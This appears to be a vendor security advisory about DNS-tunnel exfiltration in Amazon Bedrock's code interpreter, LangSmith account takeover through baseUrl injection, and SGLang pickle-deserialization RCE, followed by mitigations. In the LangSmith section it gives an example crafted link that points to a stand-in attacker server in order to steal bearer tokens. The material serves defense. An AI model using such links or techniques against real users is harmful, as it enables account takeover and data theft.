Executive Summary

Recent discoveries have revealed critical vulnerabilities in Amazon Bedrock, LangSmith, and SGLang - three prominent AI platforms - enabling data exfiltration and remote code execution (RCE). These flaws affect both cloud-based and self-hosted deployments, with some remaining unpatched as of this report. Attackers can exploit these weaknesses to bypass network isolation, hijack user accounts, and execute arbitrary code on backend servers. The vulnerabilities are particularly severe due to the sensitive data and privileged access often associated with AI workloads. This advisory provides a comprehensive technical breakdown, exploitation scenarios, affected versions, and actionable mitigation strategies to help organizations defend against these emerging threats.

Technical Information

The vulnerabilities span multiple attack surfaces and exploit distinct weaknesses in each platform’s architecture and security controls.

In Amazon Bedrock, the AgentCore Code Interpreter - introduced in August 2025 - permits outbound DNS queries even when configured in "sandbox mode" with "no network access." This design oversight allows attackers to establish covert command-and-control (C2) channels using DNS tunneling. By encoding commands and data within DNS queries and responses, adversaries can exfiltrate sensitive information, such as S3 bucket contents, and execute arbitrary code. The risk is amplified if the associated IAM role is overprivileged, potentially granting access to a wide range of AWS resources. Notably, Amazon has classified this as "intended functionality," leaving customers responsible for implementing compensating controls.

LangSmith was found vulnerable to account takeover via URL parameter injection (CVE-2026-25750, CVSS 8.5). The flaw arises from insufficient validation of the baseUrl parameter in the LangSmith Studio interface. An attacker can craft a malicious link (e.g., smith.langchain.com/studio/?baseUrl=https://attacker-server.com) and trick a logged-in user into clicking it. This action causes the user's bearer token, user ID, and workspace ID to be transmitted to the attacker’s server, enabling unauthorized access to AI trace histories, internal SQL queries, CRM records, and proprietary code. The attack vector is primarily social engineering, leveraging phishing techniques to compromise user accounts.

SGLang suffers from multiple critical vulnerabilities related to unsafe Python pickle deserialization, leading to unauthenticated RCE. Three CVEs have been assigned: CVE-2026-3059 (ZeroMQ broker, CVSS 9.8), CVE-2026-3060 (disaggregation module, CVSS 9.8), and CVE-2026-3989 (replay utility, CVSS 7.8). Attackers can send malicious pickle payloads to exposed SGLang endpoints, which are deserialized without authentication or input sanitization. This allows arbitrary code execution on the server, potentially resulting in full system compromise. The vulnerabilities are trivial to exploit and remain unpatched as of this writing.

Each vulnerability aligns with multiple MITRE ATT&CK techniques, including T1048.003 (Exfiltration Over Alternative Protocol), T1059 (Command and Scripting Interpreter), T1190 (Exploit Public-Facing Application), and T1566.002 (Phishing: Spearphishing Link).

Indicators of compromise (IOCs) include unusual outbound DNS queries from Amazon Bedrock sandboxes, unauthorized outbound requests from LangSmith Studio to attacker-controlled domains, unexpected inbound TCP connections to SGLang ZeroMQ broker ports, and anomalous child processes or file creations by the SGLang Python process.

Exploitation in the Wild

As of the latest public reporting, there are no confirmed incidents of these vulnerabilities being exploited in the wild. However, proof-of-concept (PoC) code and detailed technical advisories have been published for all three platforms. For Amazon Bedrock, BeyondTrust researchers demonstrated a working PoC that establishes a DNS-based C2 channel and exfiltrates data from the sandbox environment. In the case of LangSmith, Miggo Security released a PoC showing how a crafted URL can leak authentication tokens and session data. For SGLang, Orca Security and CERT/CC have published PoCs that exploit the pickle deserialization flaws to achieve RCE.

The public availability of these PoCs, combined with the high value of data processed by these AI platforms, significantly increases the risk of imminent exploitation, especially by opportunistic attackers and advanced persistent threats (APTs) seeking to compromise AI-driven infrastructure.

APT Groups using this vulnerability

No specific APT groups have been publicly attributed to the exploitation of these vulnerabilities as of this report. However, the attack surface—encompassing cloud AI infrastructure, developer platforms, and backend orchestration systems—makes these flaws attractive to a broad spectrum of threat actors. Sectors such as technology, finance, healthcare, and government, which are early adopters of AI and often process sensitive data, should consider themselves at elevated risk. The presence of public PoCs and the criticality of the vulnerabilities suggest that APT groups and cybercriminal organizations are likely to incorporate these exploits into their toolkits in the near future.

Affected Product Versions

Amazon Bedrock AgentCore Code Interpreter is affected in all versions as of March 2026, with no patch available. The vulnerability is present in both cloud and self-hosted deployments, specifically when using "sandbox mode" with "no network access" enabled.

LangSmith is vulnerable in all versions prior to 0.12.71, which was patched in December 2025. Both self-hosted and cloud instances are impacted. Organizations running older versions are at immediate risk and must upgrade to the latest release.

SGLang is affected in all versions as of March 2026. The vulnerabilities impact the multimodal generation module (CVE-2026-3059), encoder parallel disaggregation system (CVE-2026-3060), and the "replay_request_dump.py" utility (CVE-2026-3989). No official patches have been released, and all deployments with exposed service interfaces are vulnerable.

Workaround and Mitigation

For Amazon Bedrock, organizations should migrate critical workloads from "sandbox mode" to "VPC mode" to leverage network-level isolation. Implementing DNS firewalls, such as AWS Route53 Resolver DNS Firewall, can block unauthorized DNS queries and prevent data exfiltration via DNS tunneling. It is essential to audit IAM roles associated with Bedrock workloads, ensuring the principle of least privilege is enforced to minimize the potential impact of a compromise.

For LangSmith, immediate upgrade to version 0.12.71 or later is mandatory. User education is crucial—train staff to recognize and avoid phishing attempts, especially those involving suspicious links. Continuous monitoring for unusual outbound requests from the LangSmith Studio interface can help detect and respond to potential account takeovers.

For SGLang, restrict network access to all service interfaces, particularly the ZeroMQ broker and disaggregation modules. These endpoints should never be exposed to untrusted networks or the public internet. Monitor for suspicious process activity, such as unexpected child processes or file creations by the SGLang Python process. Apply vendor patches as soon as they become available, and consider implementing application-layer firewalls or network segmentation to further reduce exposure.

References

The following resources provide additional technical details, advisories, and PoC code:

The Hacker News: AI Flaws in Amazon Bedrock, LangSmith, and SGLang

BeyondTrust Research: Amazon Bedrock DNS Exfiltration

Miggo Security Advisory: LangSmith Account Takeover

LangSmith Release Notes: LangSmith Studio Updates

Orca Security Blog: SGLang RCE Vulnerabilities

CERT/CC Advisory: SGLang Insecure Deserialization

Reddit SecOpsDaily: Community Discussion

Infosecurity Magazine: AWS Bedrock Flaw

Rescana is here for you

Rescana is committed to helping organizations navigate the evolving threat landscape posed by AI platform vulnerabilities. Our Third-Party Risk Management (TPRM) platform empowers security teams to continuously assess, monitor, and mitigate risks across their digital supply chain. We provide actionable intelligence, automated risk scoring, and deep visibility into vendor exposures—enabling you to make informed decisions and respond rapidly to emerging threats. For any questions or to discuss how Rescana can support your cybersecurity strategy, please contact us at ops@rescana.com.